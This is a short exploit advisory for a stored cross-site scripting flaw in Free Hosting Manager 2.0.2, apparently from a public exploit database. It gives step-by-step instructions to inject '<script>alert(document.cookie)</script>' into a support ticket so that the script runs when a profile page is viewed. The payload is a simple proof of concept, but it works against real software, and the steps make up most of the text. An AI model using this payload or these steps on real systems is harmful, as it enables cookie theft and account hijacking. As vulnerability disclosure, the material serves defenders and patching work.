Free Hosting Manager version 2.0.2 suffers from a persistent cross site scripting vulnerability.
335377c3da8b74855bab0926e442b783e0a025c0a92bad72b5f9cd8afec705f8
# Exploit Title: Free hosting manager V2.0.2 Stored XSS
# Date: 19/12/2012
# Exploit Author: Lee Chung Eon
# Vendor by:
# Software Link: http://www.fhm-script.com/download.php
# Version: 2.0.2
# Category:Web Security
# Tested on: Windows xp / 7
+--------------------------------------------------------------------------+
Stored XSS-vulnerabilities
0. install
1. register complete
2. inject following code
<script>alert(document.cookie)</script>
3. into support --> ticket
4. Visit your profile and Can see the execution of injected script
------------------------------------------------------------------------------